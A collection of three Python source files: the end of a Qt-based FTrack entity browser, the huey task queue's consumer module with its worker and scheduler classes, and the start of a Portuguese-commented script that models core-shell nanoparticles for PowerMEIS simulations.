print(f'Invalid query: {query!r}')
else:
if entity is not None:
self._loadEntity(entity)
self.entityLoading.emit(progressName, 100)
@QtCore.Slot()
def entityTypeChanged(self):
"""Reset the Type ID text."""
self._typeID.setText('')
@QtCore.Slot()
def clear(self):
"""Remove all the data."""
self._entityData.model().removeRows(0, self._entityData.model().rowCount())
EntityCache.reset()
@QtCore.Slot(QtCore.QModelIndex)
def populateChildren(self, index=None):
"""Load all child items when an entity is expanded."""
model = self._entityData.model()
# Check if the items have already been populated
if model.data(index, self.VisitRole) is not None:
populated = model.data(index, self.AutoPopulateRole)
# Load the remaining entity keys if required
# The EntityKeyRole check is to avoid reloading collections
if not populated and self.autoPopulate() and not model.data(index, self.EntityKeyRole):
parentType = model.data(index, self.EntityTypeRole)
parentPrimaryKeys = model.data(index, self.EntityPrimaryKeyRole).split(';')
item = model.itemFromIndex(index)
loaded = [item.child(row).text() for row in range(item.rowCount())]
self.loadEntity(parentType, parentPrimaryKeys, parent=item, _loaded=loaded)
model.setData(index, True, self.AutoPopulateRole)
# Mark the item as visited
elif model.data(index, self.DummyRole) is not None:
model.setData(index, True, self.VisitRole)
model.setData(index, self.autoPopulate(), self.AutoPopulateRole)
item = model.itemFromIndex(index)
# Remove the dummy item
model.removeRow(0, index)
# Populate with entities
parentType = model.data(index, self.EntityTypeRole)
parentPrimaryKeys = model.data(index, self.EntityPrimaryKeyRole).split(';')
childKey = model.data(index, self.EntityKeyRole)
self.loadEntity(parentType, parentPrimaryKeys, key=childKey, parent=item)
@QtCore.Slot()
def autoResizeColumns(self):
"""Resize the columns to fit the contents.
This can only be called outside of a thread, otherwise this appears:
QBasicTimer::start: QBasicTimer can only be used with threads started with QThread
"""
self._entityData.resizeColumnToContents(0)
self._entityData.setColumnWidth(1, self._entityData.columnWidth(0))
self._entityData.resizeColumnToContents(2)
try:
self.topLevelEntityAdded.disconnect(self.autoResizeColumns)
except RuntimeError:
pass
def checkCredentials(self):
"""Ensure required environment variables are set."""
def createPopup(key, input_type, default_value):
if key in os.environ:
return False
text = os.environ.get(key, default_value)
value, valid = QtWidgets.QInputDialog.getText(
self, f'{input_type[0].upper()+input_type[1:]} required',
f'Enter FTrack {input_type}:', text=text,
)
if not valid:
return False
os.environ[key] = value
return True
createPopup('FTRACK_SERVER', 'server address', self._ftrack_server)
createPopup('FTRACK_API_KEY', 'API Key', self._ftrack_api_key)
createPopup('FTRACK_API_USER', 'username', self._ftrack_api_user)
@deferred
@errorHandler
def loadEntity(self, entityType, entityID, key=None, parent=None, _loaded=None):
"""Wrap the load function to allow multiple entities to be added."""
session = None
# Only start a session if not loading cached data
if self.autoPopulate():
session = ftrack_api.Session()
# Build a list of potential entities
if entityID:
entity = session.get(entityType, entityID)
if entity is None:
print(f'Could not find entity.')
entities = []
else:
entities = [entityID]
else:
entities = session.query(entityType)
# Load anything not yet loaded
for i, entity in enumerate(entities):
if not isinstance(entity, ftrack_api.entity.base.Entity):
entities[i] = session.get(entityType, entityID)
# Load entity from cache
else:
name = entityRepr(EntityCache.types()[entityType], entityID, remapIDs=self.remapIDs())
entity = EntityCache.entity(name)
if entity is not None:
entities = [entity]
# Add each entity to the GUI
for entity in entities:
try:
self._loadEntity(entity, key=key, parent=parent, _loaded=_loaded)
# The GUI has likely refreshed so we can stop the query here
except RuntimeError:
break
if session is not None:
session.close()
def _loadEntity(self, entity, key=None, parent=None, _loaded=None):
"""Add a new FTrack entity.
Optionally set key to load a child entity.
"""
if _loaded is None:
_loaded = []
else:
_loaded = list(sorted(_loaded))
cache = EntityCache(entity, remapIDs=self.remapIDs())
name = cache.id
attributes = type(entity).attributes
# Add a new top level item
if parent is None:
root = self._entityData.model().invisibleRootItem()
parent = self.addItem(root, None, entity, entity)
self.topLevelEntityAdded.emit()
print(f'Found {name}')
EntityCache.load(entity, remapIDs=self.remapIDs())
# Stop here as we don't want to force load everything
return
if key:
print(f'Loading data for {key!r}...')
else:
print(f'Loading data for {name}...')
# Allow individual keys to be loaded
if key:
self.entityLoading.emit(f'{name}[{key!r}]', 0)
attr = attributes.get(key)
# Load entities
if isinstance(attr, ftrack_api.attribute.ReferenceAttribute):
entity = entity[key]
# Load collections
else:
value = entity[key]
total_values = len(value)
if isinstance(attr, ftrack_api.attribute.CollectionAttribute):
for i, v in enumerate(value):
self.entityLoading.emit(f'{name}[{key!r}]', int(100 * i / total_values))
self.addItem(parent, None, v, v)
elif isinstance(attr, ftrack_api.attribute.KeyValueMappedCollectionAttribute):
for i, (k, v) in enumerate(sorted(value.items())):
self.entityLoading.emit(f'{name}[{key!r}]', int(100 * i / total_values))
self.addItem(parent, k, v, v)
self.entityLoading.emit(f'{name}[{key!r}]', 100)
print(f'Finished loading {key!r} collection')
return
# Load all keys
keys = set(entity.keys())
# Load a new entity
total_keys = len(keys)
for i, key in enumerate(sorted(keys)):
self.entityLoading.emit(name, int(100 * i / total_keys))
if key in _loaded:
continue
# Load cached value
if key in cache:
value = cache[key]
print(f'Read {key!r} from cache...')
# Fetch from server
elif self.autoPopulate():
print(f'Reading {key!r}...')
# Avoid loading non scalar types at this stage
attr = attributes.get(key)
if isinstance(attr, ftrack_api.attribute.CollectionAttribute):
value = Placeholders.Collection()
elif isinstance(attr, ftrack_api.attribute.KeyValueMappedCollectionAttribute):
value = Placeholders.KeyValueMappedCollectionProxy()
else:
try:
value = entity[key]
except ftrack_api.exception.ServerError:
print(f'Failed to read {key!r}')
continue
else:
cache[key] = value
else:
continue
# Insert in alphabetical order
row = None
if _loaded:
for i, k in enumerate(_loaded):
if k > key:
row = i
_loaded.insert(i, key)
break
self.addItem(parent, key, value, entity, row=row)
self.entityLoading.emit(name, 100)
print(f'Finished reading data from {name}')
def appendRow(self, parent, entityKey, entityValue='', entityType='', row=None):
"""Create a new row of QStandardItems."""
if self.remapIDs():
entityValue = remapID(entityValue)
item = QtGui.QStandardItem(entityKey)
data = (item, QtGui.QStandardItem(entityValue), QtGui.QStandardItem(entityType))
if row is None:
parent.appendRow(data)
else:
parent.insertRow(row, data)
return item
def addItem(self, parent, key, value, entity, row=None):
"""Add an FTrack entity value.
Parameters:
parent (QStandardItem): Parent item to append to.
key (str): The key used to access the current entity.
value (object): Value belonging to entity['key'].
entity (Entity): Parent entity.
This is used with the dummy items so that the child
entity can easily be queried later.
"""
className = type(value).__name__
if isinstance(value, (list, tuple)):
child = self.appendRow(parent, key, '', className, row=row)
for i, v in enumerate(value):
k = str(i)
self.addItem(child, k, v, entity)
elif isinstance(value, dict):
child = self.appendRow(parent, key, '', className, row=row)
for k, v in sorted(value.items()):
self.addItem(child, k, v, entity)
elif isinstance(value, ftrack_api.entity.base.Entity):
entityStr = entityRepr(value, remapIDs=self.remapIDs())
if key is None:
key, entityStr = entityStr, ''
child = self.appendRow(parent, key, entityStr, type(value).entity_type, row=row)
self.addDummyItem(child, value, '')
elif isinstance(value, (ftrack_api.collection.Collection, Placeholders.Collection)):
child = self.appendRow(parent, key, '', className, row=row)
self.addDummyItem(child, entity, key)
elif isinstance(value, (ftrack_api.collection.KeyValueMappedCollectionProxy,
Placeholders.KeyValueMappedCollectionProxy)):
child = self.appendRow(parent, key, '', className, row=row)
self.addDummyItem(child, entity, key)
else:
child = self.appendRow(parent, key, str(value), className, row=row)
return child
def addDummyItem(self, parent, entity, key):
"""Create a dummy item for things not yet loaded."""
model = self._entityData.model()
# Store data about the parent entities
primary_key_attributes = type(entity).primary_key_attributes
parentIndex = model.indexFromItem(parent)
model.setData(parentIndex, True, self.DummyRole)
model.setData(parentIndex, str(key), self.EntityKeyRole)
model.setData(parentIndex, str(entity.__class__.__name__), self.EntityTypeRole)
model.setData(parentIndex, ';'.join(str(entity[k]) for k in map(str, primary_key_attributes)), self.EntityPrimaryKeyRole)
# Create the dummy item
item = QtGui.QStandardItem('<not loaded>')
parent.appendRow(item)
return item
if __name__ == '__main__':
FTrackExplorer.show()
|
consumer.py
|
import datetime
import logging
import os
import signal
import sys
import threading
import time
from multiprocessing import Event as ProcessEvent
from multiprocessing import Process
try:
import gevent
from gevent import Greenlet
from gevent.event import Event as GreenEvent
except ImportError:
Greenlet = GreenEvent = None
from huey.constants import WORKER_GREENLET
from huey.constants import WORKER_PROCESS
from huey.constants import WORKER_THREAD
from huey.constants import WORKER_TYPES
from huey.exceptions import CancelExecution
from huey.exceptions import ConfigurationError
from huey.exceptions import DataStoreGetException
from huey.exceptions import QueueException
from huey.exceptions import QueueReadException
from huey.exceptions import DataStorePutException
from huey.exceptions import QueueWriteException
from huey.exceptions import RetryTask
from huey.exceptions import ScheduleAddException
from huey.exceptions import ScheduleReadException
from huey.exceptions import TaskLockedException
EVENT_CHECKING_PERIODIC = 'checking-periodic'
EVENT_ERROR_DEQUEUEING = 'error-dequeueing'
EVENT_ERROR_ENQUEUEING = 'error-enqueueing'
EVENT_ERROR_INTERNAL = 'error-internal'
EVENT_ERROR_SCHEDULING = 'error-scheduling'
EVENT_ERROR_STORING_RESULT = 'error-storing-result'
EVENT_ERROR_TASK = 'error-task'
EVENT_LOCKED = 'locked'
EVENT_FINISHED = 'finished'
EVENT_RETRYING = 'retrying'
EVENT_REVOKED = 'revoked'
EVENT_SCHEDULED = 'scheduled'
EVENT_SCHEDULING_PERIODIC = 'scheduling-periodic'
EVENT_STARTED = 'started'
EVENT_TIMEOUT = 'timeout'
def to_timestamp(dt):
if dt:
return time.mktime(dt.timetuple())
class BaseProcess(object):
"""
Abstract process run by the consumer. Provides convenience methods for
things like sleeping for a given amount of time and enqueueing tasks.
Subclasses should implement the `loop()` method, which is called repeatedly
until the consumer is shutdown. The `loop()` method's return value is
ignored, but an unhandled exception will lead to the process shutting down.
A typical pattern might be::
class CustomProcess(BaseProcess):
def loop(self, now=None):
# Get the current timestamp.
current_ts = time.time()
# Perform some action, which may take an arbitrary amount of
# time.
do_some_action()
# Sleep for 60 seconds, with respect to current_ts, so that
# the whole loop() method repeats every ~60s.
self.sleep_for_interval(current_ts, 60)
You will want to ensure that the consumer starts your custom process::
class MyConsumer(Consumer):
def start(self):
# Initialize workers, scheduler, signal handlers, etc.
super(MyConsumer, self).start()
# Create custom process and start it.
custom_impl = CustomProcess(huey=self.huey, utc=self.utc)
self._custom_proc = self._create_process(custom_impl, 'Custom')
self._custom_proc.start()
See also: Consumer._create_process().
"""
def __init__(self, huey, utc):
self.huey = huey
self.utc = utc
def initialize(self):
pass
def get_now(self):
if self.utc:
return datetime.datetime.utcnow()
return datetime.datetime.now()
def get_utcnow(self):
return datetime.datetime.utcnow()
def get_timestamp(self):
return time.mktime(self.get_utcnow().timetuple())
def sleep_for_interval(self, start_ts, nseconds):
"""
Sleep for a given interval with respect to the start timestamp.
So, if the start timestamp is 1337 and nseconds is 10, the method will
actually sleep for nseconds - (current_timestamp - start_timestamp). So
if the current timestamp is 1340, we'll only sleep for 7 seconds (the
goal being to sleep until 1347, or 1337 + 10).
"""
sleep_time = nseconds - (time.time() - start_ts)
if sleep_time <= 0:
return
self._logger.debug('Sleeping for %s', sleep_time)
# Recompute time to sleep to improve accuracy in case the process was
# pre-empted by the kernel while logging.
sleep_time = nseconds - (time.time() - start_ts)
if sleep_time > 0:
time.sleep(sleep_time)
def enqueue(self, task):
"""
Convenience method for enqueueing a task.
"""
try:
self.huey.enqueue(task)
except QueueWriteException:
self.huey.emit_task(EVENT_ERROR_ENQUEUEING, task, error=True)
self._logger.exception('Error enqueueing task: %s', task)
else:
self._logger.debug('Enqueued task: %s', task)
def loop(self, now=None):
"""
Process-specific implementation. Called repeatedly for as long as the
consumer is running. The `now` parameter is currently only used in the
unit-tests (to avoid monkey-patching datetime / time). Return value is
ignored, but an unhandled exception will lead to the process exiting.
"""
raise NotImplementedError
class Worker(BaseProcess):
"""
Worker implementation.
Will pull tasks from the queue, executing them or adding them to the
schedule if they are set to run in the future.
"""
def __init__(self, huey, default_delay, max_delay, backoff, utc):
self.delay = self.default_delay = default_delay
self.max_delay = max_delay
self.backoff = backoff
self._logger = logging.getLogger('huey.consumer.Worker')
self._pre_execute = huey.pre_execute_hooks.items()
self._post_execute = huey.post_execute_hooks.items()
super(Worker, self).__init__(huey, utc)
def initialize(self):
for name, startup_hook in self.huey.startup_hooks.items():
self._logger.debug('calling startup hook "%s"', name)
try:
startup_hook()
except Exception as exc:
self._logger.exception('startup hook "%s" failed', name)
def loop(self, now=None):
task = None
exc_raised = True
try:
task = self.huey.dequeue()
except QueueReadException:
self.huey.emit_status(EVENT_ERROR_DEQUEUEING, error=True)
self._logger.exception('Error reading from queue')
except QueueException:
self.huey.emit_status(EVENT_ERROR_INTERNAL, error=True)
self._logger.exception('Queue exception')
except KeyboardInterrupt:
raise
except:
self.huey.emit_status(EVENT_ERROR_DEQUEUEING, error=True)
self._logger.exception('Unknown exception dequeueing task.')
else:
exc_raised = False
if task:
self.delay = self.default_delay
self.handle_task(task, now or self.get_now())
elif exc_raised or not self.huey.blocking:
self.sleep()
def sleep(self):
if self.delay > self.max_delay:
self.delay = self.max_delay
self._logger.debug('No messages, sleeping for: %s', self.delay)
time.sleep(self.delay)
self.delay *= self.backoff
def handle_task(self, task, ts):
"""
Handle a task that was just read from the queue. There are three
possible outcomes:
1. Task is scheduled for the future, add to the schedule.
2. Task is ready to run, but has been revoked. Discard.
3. Task is ready to run and not revoked. Execute task.
"""
if not self.huey.ready_to_run(task, ts):
self.add_schedule(task)
elif not self.is_revoked(task, ts):
self.process_task(task, ts)
else:
self.huey.emit_task(
EVENT_REVOKED,
task,
timestamp=to_timestamp(ts))
self._logger.debug('Task %s was revoked, not running', task)
def process_task(self, task, ts):
"""
Execute a task and (optionally) store the return value in result store.
Unhandled exceptions are caught and logged.
"""
self.huey.emit_task(EVENT_STARTED, task, timestamp=to_timestamp(ts))
if self._pre_execute:
try:
self.run_pre_execute_hooks(task)
except CancelExecution:
return
self._logger.info('Executing %s', task)
start = time.time()
exception = None
task_value = None
try:
try:
task_value = self.huey.execute(task)
finally:
duration = time.time() - start
self._logger.debug('Task %s ran in %0.3fs', task, duration)
except DataStorePutException:
self._logger.exception('Error storing result')
self.huey.emit_task(
EVENT_ERROR_STORING_RESULT,
task,
error=True,
duration=duration)
except TaskLockedException as exc:
self._logger.warning('Task %s could not run, unable to obtain '
'lock.', task.task_id)
self.huey.emit_task(
EVENT_LOCKED,
task,
error=False,
duration=duration)
exception = exc
except RetryTask:
if not task.retries:
self._logger.error('Cannot retry task %s - no retries '
'remaining.', task.task_id)
exception = True
except KeyboardInterrupt:
self._logger.info('Received exit signal, task %s did not finish.',
task.task_id)
return
except Exception as exc:
self._logger.exception('Unhandled exception in worker thread')
self.huey.emit_task(
EVENT_ERROR_TASK,
task,
error=True,
duration=duration)
exception = exc
else:
self.huey.emit_task(
EVENT_FINISHED,
task,
duration=duration,
timestamp=self.get_timestamp())
if self._post_execute:
self.run_post_execute_hooks(task, task_value, exception)
if exception is not None and task.retries:
self.requeue_task(task, self.get_now())
def run_pre_execute_hooks(self, task):
self._logger.info('Running pre-execute hooks for %s', task)
for name, callback in self._pre_execute:
self._logger.debug('Executing %s pre-execute hook.', name)
try:
callback(task)
except CancelExecution:
self._logger.info('Execution of %s cancelled by %s.', task,
name)
raise
except Exception:
self._logger.exception('Unhandled exception calling pre-'
'execute hook %s for %s.', name, task)
def run_post_execute_hooks(self, task, task_value, exception):
self._logger.info('Running post-execute hooks for %s', task)
for name, callback in self._post_execute:
self._logger.debug('Executing %s post-execute hook.', name)
try:
callback(task, task_value, exception)
except Exception as exc:
self._logger.exception('Unhandled exception calling post-'
'execute hook %s for %s.', name, task)
def requeue_task(self, task, ts):
task.retries -= 1
self.huey.emit_task(EVENT_RETRYING, task)
self._logger.info('Re-enqueueing task %s, %s tries left',
task.task_id, task.retries)
if task.retry_delay:
delay = datetime.timedelta(seconds=task.retry_delay)
task.execute_time = ts + delay
self.add_schedule(task)
else:
self.enqueue(task)
def add_schedule(self, task):
self._logger.info('Adding %s to schedule', task)
try:
self.huey.add_schedule(task)
except ScheduleAddException:
self.huey.emit_task(EVENT_ERROR_SCHEDULING, task, error=True)
self._logger.error('Error adding task to schedule: %s', task)
else:
self.huey.emit_task(EVENT_SCHEDULED, task)
def is_revoked(self, task, ts):
try:
if self.huey.is_revoked(task, ts, peek=False):
return True
return False
except DataStoreGetException:
self.huey.emit_task(EVENT_ERROR_INTERNAL, task, error=True)
self._logger.error('Error checking if task is revoked: %s', task)
return True
class Scheduler(BaseProcess):
"""
Scheduler handles enqueueing tasks when they are scheduled to execute. Note
that the scheduler does not actually execute any tasks, but simply enqueues
them so that they can be picked up by the worker processes.
If periodic tasks are enabled, the scheduler will wake up every 60 seconds
to enqueue any periodic tasks that should be run.
"""
def __init__(self, huey, interval, utc, periodic):
super(Scheduler, self).__init__(huey, utc)
self.interval = min(interval, 60)
self.periodic = periodic
if periodic:
# Determine the periodic task interval.
self._counter = 0
self._q, self._r = divmod(60, self.interval)
self._cr = self._r
self._logger = logging.getLogger('huey.consumer.Scheduler')
self._next_loop = time.time()
def loop(self, now=None):
current = self._next_loop
self._next_loop += self.interval
if self._next_loop < time.time():
self._logger.info('scheduler skipping iteration to avoid race.')
return
try:
task_list = self.huey.read_schedule(now or self.get_now())
except ScheduleReadException:
#self.huey.emit_task(EVENT_ERROR_SCHEDULING, task, error=True)
self._logger.exception('Error reading from task schedule.')
else:
for task in task_list:
self._logger.info('Scheduling %s for execution', task)
self.enqueue(task)
if self.periodic:
# The scheduler has an interesting property of being able to run at
# intervals that are not factors of 60. Suppose we ask our
# scheduler to run every 45 seconds. We still want to schedule
# periodic tasks once per minute, however. So we use a running
# remainder to ensure that no matter what interval the scheduler is
# running at, we still are enqueueing tasks once per minute at the
# same time.
if self._counter >= self._q:
self._counter = 0
if self._cr:
self.sleep_for_interval(current, self._cr)
if self._r:
self._cr += self._r
if self._cr >= self.interval:
self._cr -= self.interval
self._counter -= 1
self.enqueue_periodic_tasks(now or self.get_now(), current)
self._counter += 1
self.sleep_for_interval(current, self.interval)
def enqueue_periodic_tasks(self, now, start):
self.huey.emit_status(
EVENT_CHECKING_PERIODIC,
timestamp=self.get_timestamp())
self._logger.debug('Checking periodic tasks')
for task in self.huey.read_periodic(now):
self.huey.emit_task(
EVENT_SCHEDULING_PERIODIC,
task,
timestamp=self.get_timestamp())
self._logger.info('Scheduling periodic task %s.', task)
self.enqueue(task)
return True
class Environment(object):
"""
Provide a common interface to the supported concurrent environments.
"""
def get_stop_flag(self):
raise NotImplementedError
def create_process(self, runnable, name):
raise NotImplementedError
def is_alive(self, proc):
raise NotImplementedError
class ThreadEnvironment(Environment):
def get_stop_flag(self):
return threading.Event()
def create_process(self, runnable, name):
t = threading.Thread(target=runnable, name=name)
t.daemon = True
return t
def is_alive(self, proc):
return proc.isAlive()
class GreenletEnvironment(Environment):
def get_stop_flag(self):
return GreenEvent()
def create_process(self, runnable, name):
def run_wrapper():
gevent.sleep()
runnable()
gevent.sleep()
return Greenlet(run=run_wrapper)
def is_alive(self, proc):
return not proc.dead
class ProcessEnvironment(Environment):
def get_stop_flag(self):
return ProcessEvent()
def create_process(self, runnable, name):
p = Process(target=runnable, name=name)
p.daemon = True
return p
def is_alive(self, proc):
return proc.is_alive()
WORKER_TO_ENVIRONMENT = {
WORKER_THREAD: ThreadEnvironment,
WORKER_GREENLET: GreenletEnvironment,
'gevent': GreenletEnvironment, # Preserved for backwards-compat.
WORKER_PROCESS: ProcessEnvironment,
}
class Consumer(object):
"""
Consumer sets up and coordinates the execution of the workers and scheduler
and registers signal handlers.
"""
def __init__(self, huey, workers=1, periodic=True, initial_delay=0.1,
backoff=1.15, max_delay=10.0, utc=True, scheduler_interval=1,
worker_type='thread', check_worker_health=True,
health_check_interval=1, flush_locks=False):
self._logger = logging.getLogger('huey.consumer')
if huey.always_eager:
self._logger.warning('Consumer initialized with Huey instance '
'that has "always_eager" mode enabled. This '
'must be disabled before the consumer can '
'be run.')
self.huey = huey
self.workers = workers # Number of workers.
self.periodic = periodic # Enable periodic task scheduler?
self.default_delay = initial_delay # Default queue polling interval.
self.backoff = backoff # Exponential backoff factor when queue empty.
self.max_delay = max_delay # Maximum interval between polling events.
self.utc = utc # Timestamps are considered UTC.
# Ensure that the scheduler runs at an interval between 1 and 60s.
self.scheduler_interval = max(min(scheduler_interval, 60), 1)
self.worker_type = worker_type # What process model are we using?
# Configure health-check and consumer main-loop attributes.
self._stop_flag_timeout = 0.1
self._health_check = check_worker_health
self._health_check_interval = float(health_check_interval)
# Create the execution environment helper.
self.environment = self.get_environment(self.worker_type)
# Create the event used to signal the process should terminate. We'll
# also store a boolean flag to indicate whether we should restart after
# the processes are cleaned up.
self._received_signal = False
self._restart = False
self._graceful = True
self.stop_flag = self.environment.get_stop_flag()
# In the event the consumer was killed while running a task that held
# a lock, this ensures that all locks are flushed before starting.
if flush_locks:
self.flush_locks()
# Create the scheduler process (but don't start it yet).
scheduler = self._create_scheduler()
self.scheduler = self._create_process(scheduler, 'Scheduler')
# Create the worker process(es) (also not started yet).
self.worker_threads = []
for i in range(workers):
worker = self._create_worker()
process = self._create_process(worker, 'Worker-%d' % (i + 1))
# The worker threads are stored as [(worker impl, worker_t), ...].
# The worker impl is not currently referenced in any consumer code,
# but it is referenced in the test-suite.
self.worker_threads.append((worker, process))
def flush_locks(self):
self._logger.debug('Flushing locks before starting up.')
flushed = self.huey.flush_locks()
if flushed:
self._logger.warning('Found stale locks: %s' % (
', '.join(key for key in flushed)))
def get_environment(self, worker_type):
if worker_type not in WORKER_TO_ENVIRONMENT:
raise ValueError('worker_type must be one of %s.' %
', '.join(WORKER_TYPES))
return WORKER_TO_ENVIRONMENT[worker_type]()
def _create_worker(self):
return Worker(
huey=self.huey,
default_delay=self.default_delay,
max_delay=self.max_delay,
backoff=self.backoff,
utc=self.utc)
def _create_scheduler(self):
return Scheduler(
huey=self.huey,
interval=self.scheduler_interval,
utc=self.utc,
periodic=self.periodic)
def _create_process(self, process, name):
"""
Repeatedly call the `loop()` method of the given process. Unhandled
exceptions in the `loop()` method will cause the process to terminate.
"""
def _run():
process.initialize()
try:
while not self.stop_flag.is_set():
process.loop()
except KeyboardInterrupt:
pass
except:
self._logger.exception('Process %s died!', name)
return self.environment.create_process(_run, name)
def start(self):
"""
Start all consumer processes and register signal handlers.
"""
if self.huey.always_eager:
raise ConfigurationError(
'Consumer cannot be run with Huey instances where always_eager'
' is enabled. Please check your configuration and ensure that'
' "huey.always_eager = False".')
# Log startup message.
self._logger.info('Huey consumer started with %s %s, PID %s',
self.workers, self.worker_type, os.getpid())
self._logger.info('Scheduler runs every %s second(s).',
self.scheduler_interval)
self._logger.info('Periodic tasks are %s.',
'enabled' if self.periodic else 'disabled')
self._logger.info('UTC is %s.', 'enabled' if self.utc else 'disabled')
self._set_signal_handlers()
msg = ['The following commands are available:']
for command in self.huey.registry._registry:
msg.append('+ %s' % command.replace('queuecmd_', ''))
self._logger.info('\n'.join(msg))
# We'll temporarily ignore SIGINT and SIGHUP (so that it is inherited
# by the child-processes). Once the child processes are created, we
# restore the handler.
original_sigint_handler = signal.signal(signal.SIGINT, signal.SIG_IGN)
if hasattr(signal, 'SIGHUP'):
original_sighup_handler = signal.signal(signal.SIGHUP, signal.SIG_IGN)
self.scheduler.start()
for _, worker_process in self.worker_threads:
worker_process.start()
signal.signal(signal.SIGINT, original_sigint_handler)
if hasattr(signal, 'SIGHUP'):
signal.signal(signal.SIGHUP, original_sighup_handler)
def stop(self, graceful=False):
"""
Set the stop-flag.
If `graceful=True`, this method blocks until the workers to finish
executing any tasks they might be currently working on.
"""
self.stop_flag.set()
if graceful:
self._logger.info('Shutting down gracefully...')
try:
for _, worker_process in self.worker_threads:
worker_process.join()
except KeyboardInterrupt:
self._logger.info('Received request to shut down now.')
else:
self._logger.info('All workers have stopped.')
else:
self._logger.info('Shutting down')
def run(self):
"""
Run the consumer.
"""
self.start()
timeout = self._stop_flag_timeout
health_check_ts = time.time()
while True:
try:
self.stop_flag.wait(timeout=timeout)
except KeyboardInterrupt:
self._logger.info('Received SIGINT')
self.stop(graceful=True)
except:
self._logger.exception('Error in consumer.')
self.stop()
else:
if self._received_signal:
self.stop(graceful=self._graceful)
if self.stop_flag.is_set():
break
if self._health_check:
now = time.time()
if now >= health_check_ts + self._health_check_interval:
health_check_ts = now
self.check_worker_health()
if self._restart:
self._logger.info('Consumer will restart.')
python = sys.executable
os.execl(python, python, *sys.argv)
else:
self._logger.info('Consumer exiting.')
def check_worker_health(self):
"""
Check the health of the worker processes. Workers that have died will
be replaced with new workers.
"""
self._logger.debug('Checking worker health.')
workers = []
restart_occurred = False
for i, (worker, worker_t) in enumerate(self.worker_threads):
if not self.environment.is_alive(worker_t):
self._logger.warning('Worker %d died, restarting.', i + 1)
worker = self._create_worker()
worker_t = self._create_process(worker, 'Worker-%d' % (i + 1))
worker_t.start()
restart_occurred = True
workers.append((worker, worker_t))
if restart_occurred:
self.worker_threads = workers
else:
self._logger.debug('Workers are up and running.')
if not self.environment.is_alive(self.scheduler):
self._logger.warning('Scheduler died, restarting.')
scheduler = self._create_scheduler()
self.scheduler = self._create_process(scheduler, 'Scheduler')
self.scheduler.start()
else:
self._logger.debug('Scheduler is up and running.')
return not restart_occurred
def _set_signal_handlers(self):
signal.signal(signal.SIGTERM, self._handle_stop_signal)
signal.signal(signal.SIGINT, signal.default_int_handler)
if hasattr(signal, 'SIGHUP'):
signal.signal(signal.SIGHUP, self._handle_restart_signal)
def _handle_stop_signal(self, sig_num, frame):
self._logger.info('Received SIGTERM')
self._received_signal = True
self._restart = False
self._graceful = False
def _handle_restart_signal(self, sig_num, frame):
self._logger.info('Received SIGHUP, will restart')
self._received_signal = True
self._restart = True
|
thirdparallel_powermeismatrix_general.py
|
### aqui será mostrado como faremos o programa que trata de construir matrizes de uma forma geral, dada as geometrias de empilhamento que foram estudadas!!!
# -*- coding: utf-8 -*-
import numpy
import threading
import math
import multiprocessing
from numpy import matrix,sqrt
from multiprocessing.pool import ThreadPool
from multiprocessing import Pool
from joblib import Parallel, delayed
from functools import partial
###########################################################################################################################
###########################################################################################################################
###########################################################################################################################
###########################################################################################################################
###########################################################################################################################
###########################################################################################################################
# aqui será escolhida o ordenamento dos elementos na nano
## isto tem que ser revisto para fazer acordo com o programa PowerMEIS
def estruturas(alloytudo,cascaptpd,core,cs,dl):
cnum=4.0
if (alloytudo=='s' ):
radiuspt=(float(input('Tamanho do Caroço de PtPd')))
radiuspd=radiuspt
radiusc=radiuspt+cs
radiuscore=radiuspt
radiusshell=radiuspt
corenumber= 3
shellnumber=3
# print (radiusc,radiusshell,radiuscore)
if(alloytudo == 'n'):
if(cascaptpd=='s' and core=='pt'):
radiuspt=float(input('Tamanho do Caroço de Pt'))
radiuspd=float(input('Tamanho da Casca de PtPd '))
radiusc=radiuspt+cs
radiuscore=radiuspt
radiusshell=radiuspd
corenumber=1
shellnumber=3.0
if(cascaptpd=='s' and core=='pd'):
radiuspd=float(input('Tamanho do Caroço de Pd '))
radiuspt=float(input('Tamanho da Casca de PtPd '))
radiusc=radiuspt+cs
radiuscore=radiuspd
radiusshell=radiuspt
corenumber=2
shellnumber=3.0
if(cascaptpd=='n'):
core=float(input('Tamanho do Caroço de pd ou pt?? '))
if(core=='pd'):
radiuspd=float(input('Tamanho do Caroço de Pd '))
radiuspt= float(input('Tamanho da Casca de Pt'))
radiusc=radiuspt+cs
radiuscore=radiuspd
radiusshell=radiuspt
corenumber=2
shellnumber=1
if(core=='pt'):
radiuspt=float(input('Tamanho do Caroço de Pt '))
radiuspd=float(input('Tamanho da Casca de Pd'))
radiusc=radiuspd+cs
radiuscore=radiuspt
radiusshell=radiuspd
corenumber=1
shellnumber=2
# if(alloytudo == 'n' and cascaptpd == 'n' and (core =='pd' or core == 'pt')):
# return [radiusc, radiuscore, radiusshell, corenumber, shellnumber, radiuspt, radiuspd,cnum]
# if(alloytudo =='s'):
return [radiusc,radiuscore,radiusshell,corenumber,shellnumber,cnum]
###########################################################################################################################
# fazer uma função que determine se a posição x,y,z está dentro do core-shell
# this function is to generate spherical nanoparticles
def incoreshell_sphere(Npiy,Npix,w,g,i,j,k,ii,a,b,cnum,radiusc,radiuscore, radiusshell, corenumber, shellnumber,dl,h,x,y,z):
div=float(radiusc/dl)
# x[ii]= float((((float((1-(g-1)*sqrt(3.0)+Npiy)))*div-i+2)))
# y[ii]= float(((float((-1+1-(g-1)+2*(w-1)+Npiy))*div-j)+2))
# z[ii]= float(((float((sqrt(3.0)*(h-1)+1))*div-k+2)))
# print (x[ii])
# print(corenumber)
aa=0
# core
if ( ((x[ii]/(div))**2+(y[ii]/(div))**2+(z[ii]/(div))**2) <= (((float(radiuscore))/(float(radiusc)))**2) ):
# A[a][b]=corenumber
index=corenumber
aa=1
# print(corenumber, "corenum")
# shell
if ( (((x[ii]/(div))**2+(y[ii]/(div))**2+ (z[ii]/(div))**2) >= (((float(radiuscore))/(float(radiusc)))**2)) and (((x[ii]/(div))**2+(y[ii]/(div))**2+ (z[ii]/(div))**2) <= (((float(radiusshell))/(float(radiusc)))**2))):
# A[a][b]=shellnumber
index=shellnumber
aa=1
# carbon shell
if ( (((x[ii]/((div)))**2+(y[ii]/((div)))**2+ (z[ii]/((div)))**2) >= (((float(radiusshell))/(float(radiusc)))**2)) and (((x[ii]/((div)))**2+(y[ii]/((div)))**2+ (z[ii]/((div)))**2) <= ((1.0)**2))):
# A[a][b]=cnum
index=cnum
aa=1
if(aa==0):
index=0
if(aa==1):
pass
# print (index,'index')
return index,aa
###########################################################################################################################
# fazer uma função que determine se a posição x,y,z está dentro do core-shell
# this function is to generate interpenetrated spherical nanoparticles with a surfactant shell!!!!!!!!
